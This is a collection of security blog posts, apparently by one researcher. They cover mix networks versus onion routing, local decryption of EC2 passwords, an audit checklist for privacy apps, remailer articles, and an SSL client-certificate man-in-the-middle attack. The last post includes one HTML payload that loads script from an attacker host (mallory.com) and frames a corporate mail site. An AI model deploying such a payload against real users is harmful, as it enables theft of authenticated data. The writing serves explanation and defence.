As was pointed out in a recent comment on the first blog post I wrote on crypto.is, I had used the terms "mix network" and "onion routing" almost interchangeably. In actuality I had fallen into a trap that a fair number of people familiar with the space have fallen into: using those terms without a solid differentiation. This blog post aims to correct that.
Firstly, I must give credit where credit is due - Paul Syverson (one of the original authors of Tor) wrote the paper that cemented this in my head most clearly, and I will quote it, and then restate it with pictures:
Mix networks get their security from the mixing done by their component mixes, and may or may not use route unpredictability to enhance security. Onion routing networks primarily get their security from choosing routes that are difficult for the adversary to observe, which for designs deployed to date has meant choosing unpredictable routes through a network. And onion routers typically employ no mixing at all. This gets at the essence of the two even if it is a bit too quick on both sides. Mixes are also usually intended to resist an adversary that can observe all traffic everywhere and, in some threat models, to actively change traffic. Onion routing assumes that an adversary who observes both ends of a communication path will completely break the anonymity of its traffic. Thus, onion routing networks are designed to resist a local adversary, one that can only see a subset of the network and the traffic on it.
Onion Routing gets its security from the fact (or assumption) that it is difficult for an adversary to position itself on networks such that it is able to view all the nodes in the route. Practically speaking, if I built a route from my job in China, to a server in Australia, to a server in Russia, to a server in Sweden, and then visit a webpage in France - there are a number of adversaries who could see part of this path. For example: my employer, my employer's Internet Service Provider, the Chinese, Australian, Russian, Swedish, and French Governments, the website operator and their Internet Service Provider. But none of those entities are able to see the entire path (we hope!) because they do not own, control, or have direct influence over every network link I'm using. In this instance, Onion Routing can provide some security.
Onion Routing Attacked
But if an adversary is able to see the entire path, Onion Routing loses its security. I recently used a crowd of people in a real-life demonstration of this. Alice puts a message into an opaque film canister, and passes it to an onion routing node, who passes it to another, who passes it to another, who takes the message out of the canister, and hands it to the recipient Bob. Everyone in the room can clearly see that it was Alice who passed a message to Bob, and even if there were multiple messages being passed, anyone could focus on an individual, and watch where the film canister passed wound up.
There's been rumors and talks in the past of China or Iran cutting themselves off from the Internet, and making their own national Internet. If they did, we could not just stand up a Tor network inside the country: it would provide no security because the government would be able to see the entire path.
There is another scenario where Onion Routing is known to fall down. If the adversary can see one node (A), and later another node (C) - even if there is an unseen or unknown number of nodes between A and C, an attacker can correlate the traffic. A specific instance of this means if an attacker can see you, and can see the website you're visiting, even if you create a path outside the adversary's control - they will still be able to correlate the traffic and learn you are visiting the website. This clearly raises concerns about using Onion Routing to visit a company website or websites related to your own government.
Mixing; however, is specifically designed to provide security even if an adversary can see the entire path. To demonstrate this to a crowd of people I had Alice, Bob, and Carol each submit messages, in opaque film canisters, into my mix node (my backpack). With all three film canister messages in my bag, I shook it, and distributed each message to a new mix node, each of which also had a couple of messages in their bags already. Then those nodes distributed messages to 6 more mix nodes, and those mix nodes opened the messages and distributed them to recipients. Although everyone was able to see all of the messages that were passed around - it's impossible to tell who got Alice's, Bob's, or Carol's specific message. The mixing, in backpacks, creates uncertainty for the attacker they are not able to overcome.
Mixing isn't perfect. An adversary can still conduct long term correlation attacks, and if no one or almost no one uses the mix network along with you - it's even easier to attack. Furthermore, just because mix networks provide stronger security against a stronger adversary does not mean they provide better security in general. If you'd like to learn why, you can wait a while until I post about it, or just skip the middle man and read Sleeping dogs lie on a bed of onions but wake when mixed by Paul Syverson.
A Mix Node must collect more than one message before sending any out - otherwise the node is behaving as an onion router node with a time delay. The more messages collected, the more uncertainty is introduced as to which message went where. The specific mixing algorithms employed (often calling pooling algorithms) will be a subject of a future blog post, but it's clear there must be multiple messages, which means the collected messages will generally sit in a mix node until 'sufficient' messages are collected (for some definition of sufficient). This introduces latency. If a mix node waits six hours to collect messages - well that's up to six hours of latency. Accordingly, mix networks are often casually referred to as 'high latency' and onion routing networks as 'low latency'. But the latency doesn't impart security - it's the mixing.
Tor is an Onion Routing network. It employs no mixing, and barring normal system task scheduling and processing, messages are sent as soon as they are received. The attacks described against onion routing above can and have been shown to work against Tor. While there is no evidence a government has resorted to performing the types of statistical attacks described in Academic papers - they have done rudimentary correlation involving physical surveillance. Specifically: they watched a suspect arrive home, they watched some Tor traffic originate from his home, and they watched as the nickname they suspected was him appeared in the IRC channel. If you're curious, you can read more about that over here. Although Tor is a powerful tool, it is possible to distinguish Tor traffic from normal traffic, and it is possible to perform correlation-based attacks to de-anonymize your use of it.
Something to keep in mind is that deployed mix networks (Mixmaster, Mixminion) are not designed to disguise the fact that you are using a mix network. If an adversary can simply lock you up for using anonymity tools, you need to disguise your use of anonymity tools, which is a whole other topic. Similarly, these tools are relatively obscure, and if an adversary can simply look across a large quantity of email traffic looking for someone who has received a Mixmaster message, who had not previously, simple correlation may also be possible.
This post originally appeared on crypto.is. Comments will be moved there.
If you spin up a Windows Instance on Amazon EC2, the only way to get your password to it is using an Amazon-provided command-line tool to decrypt the password (supplying your private SSH Key) or pasting your private SSH key into the Web Interface. That didn't sit too well with me. I'd prefer Amazon not have my private SSH key.
The password is padded with PKCS#1 1.5, encrypted, and then put through some odd byte/hex transformations. If you'd like to decrypt the password yourself, locally, I've put up a script on github to do so. It doesn't handle every corner case (encrypted keys being the biggest) but it hopefully it helps you a little.
Liberation Technology is kind of a catch-all bucket I borrowed from Stanford's Program & Listserv that I use to describe technology that's designed to be used by activisits, journalists, folks with increased privacy needs (survey participants, whistleblowers, law enforcement), and the like. (I'm probably offending or upsetting someone by using this term willy nilly but I don't have a better one.) These types of applications obviously have a higher bar for security: not only do they need to be free from the major 'bad' vulnerabilities like SQL Injection and Memory Corruption - but also thought and attention needs to be paid to things like "What third party requests are made?" and "What does my use of this application leak to a network observer?"
There are a dearth of folks who are good at reviewing these applications, and of the ones their are - their time is spread too thinly and ultimately it's nobody's job so it's done in their free time. To that end, I took a stab at putting all the things I've picked up over the years together, in an effort to get more folks involved in the process. That list (sponsored by my employer) lives over here at github. It's aimed directly at fellow security consultants, and intended to list additional technical issues to search for when auditing these types of applications. I'm not nearly the best at this, and I don't do as much as I'd like to, but it's something, and you can improve or fork it.
What should you target with these ideas? Everything! There are high-profile applications like the ones by the Tor Project, Whisper Systems, and the Guardian Project. There are newer flashy projects like Cryptocat, MEGA, and Crypton. And there are brand-new projects that might take a bit of reverse engineering to understand - like Wickr and Silent Circle. And this is not an exhaustive list. The number of these types of applications has been increasing significantly in the past couple of years. The number of auditors has not.
I hope this list will inspire more people to look at these applications and contribute to them.
This post originally appeared on iSEC Partners' blog.
I don't write a lot, so when I do write for another blog (usualy an employer's) I tend to go to pains to copy the blog post here (with a credit). Today I've published five technical blog posts for another blog, but I'm not reposting them - I'm just pointing at them. They're hosted on the same machine as this one, just on a seperate domain, so I'm not worried about losing them.
Crypto.is kicks off its blog with a series of articles about remailers! This is the first several installments in what is intended to be a series on how remailers work, the theory behind them, and many of the choices that must be considered. Some of the topics we intended to dive deeply into in the future is how to have a directory of remailer nodes, how to handle messages that overflow the packet size, more details on Mixminion, as-yet-unimplemented Academic Papers (like Pynchon Gate and Sphinx), and more! Check out posts One, Two, Three, Four, and Five. The comments section should work, so please do leave comments if you have questions, insights, or corrections!
These blog posts are:
|5||A Tagging Attack on Mixmaster||05 Jan 2013 23:48:00 EST by Tom Ritter|
|4||Packet Formats 1 of 3(?)||05 Jan 2013 23:47:00 EST by Tom Ritter|
|3||Tagging Attacks||05 Jan 2013 23:46:00 EST by Tom Ritter|
|2||Remailers We've Got||05 Jan 2013 23:45:00 EST by Tom Ritter|
|1||What is a Remailer?||05 Jan 2013 23:44:00 EST by Tom Ritter|
I put a lot of effort into them, and it goes into (what I think) are fairly complicated topics like tagging attacks, so I hope you like them!
SSL is designed to provide Authenticity, Confidentiality, and Integrity. If an attacker is performing a Man in the Middle attack, they can slow down or close a SSL connection - but they cannot modify or learn the contents. The attacker should also not be able to impersonate the server - that's the Authenticity part. But Authenticity relies on Certificate Authorities - the attacker cannot impersonate a site because a CA will verify the applicant controls the domain applied for. But in the past couple years, we've seen some cracks there that have allowed advanced attackers to impersonate arbitrary and high-profile sites on the Internet. And of course, non-validating clients or installing a rogue CA into your trust store would make this easy too.
Most websites authenticate a user using a username and password over HTTP. If an attacker is able to impersonate a website to a user they are able to use that ability to steal the username and password, talk to the website pretending to be the user, and proxy the data back and forth. Client certificates provide a stronger degree of authentication. An attacker can impersonate a website to a user, but cannot impersonate the user to the website because they do not know the client's private key. This severely limits the attacker: generally speaking the attacker is interested in learning the user's stored data on the server: for example the user's email. To accomplish this when the user authenticates with client certificates, the attacker would need the client certificate - to retrieve it they would have to exploit the user's browser or try a social engineering attack to trick the user into running malware manually. While those attacks are possible, they are not reliable or stealthy.
With this new attack technique, Alice tries to connect to Bob, but is intercepted by Mallory. Mallory impersonates Bob to Alice, and requests a client certificate, which Alice expects. Alice selects her client certificate, which Mallory will accept without performing any certificate validation. After the TLS handshake is complete, Mallory returns a page that looks like this:
<html><body> <script src="https://mallory.com/d.js"></script> <iframe src="https://mail.corp.com" /> </body></html>
Mallory also sends a HTTP Connection:close directive and closes the SSL and TCP connection.
Unfortunately, there's not much that can be changed in browsers to mitigate this attack. Any form of short-term certificate pinning (as is done with DNS to thwart DNS Rebinding will break some use of certificates on the internet: either different certificates on subdomains, CDNs, paths that route to a new webserver, or the case where every webserver has its own SSL Certificate (the 'Citi Bank' problem as dubbed by Moxie.)
This post originally appeared on iSEC Partners' blog.